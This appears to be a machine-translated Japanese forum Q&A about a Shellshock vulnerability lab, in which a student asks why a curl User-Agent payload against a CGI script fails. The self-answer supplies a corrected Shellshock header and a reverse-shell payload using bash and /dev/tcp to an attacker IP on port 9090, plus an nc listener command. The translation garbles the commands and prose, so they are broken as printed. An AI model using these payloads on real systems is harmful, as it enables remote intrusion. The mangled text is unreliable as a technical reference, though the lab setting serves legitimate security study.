エージェントフィールドは設定されていますが、シェルショックの機能は実行されていません

Question

私はシラバスのシェルショック脆弱性ラボを解決しようとしていますが、私はエージェントフィールドをベローコマンドで設定しました Curl -A "（）{echo hello;}; Content_type ：text/plainで、エコー;/binに/ lsの-l "http://localhost/cgi-bin/sample.cgi

入れて、まだ私は、環境変数をチェックすることで、エージェントのフィールドをテストするCGIスクリプト

内部に配置されたハロー言葉です。それは私の命令に設定されたが、実行されていない？なぜbashがこれを構文解析して機能しなかったのかについての示唆 ありがとうございました

Answer 1

私は最終的に自分自身の答えが間違った構文のためにありました。 正しい構文は次のとおりです。 Curl -A '（）{：;}; Content_type：text/plain;エコー;/bin/ls -l ' リバースシェルを取得するためのbashコマンドを実行する場合、次のようになります。 Curl -A'（）{：;}; $（/ binに/ bashの-i>は/ dev/TCP /あなたのIP/9090 2> & 1 0> & 1'

http://yourwebsiteadrress/cgi-bin/your

が9090に耳を傾けるあなたのマシンを作ることを忘れないでくださいCGIファイルまず、このことによって、当然のことながら新しいターミナル

NC -l 9090 -v

に続いて、あなたは逆のシェル

を持っています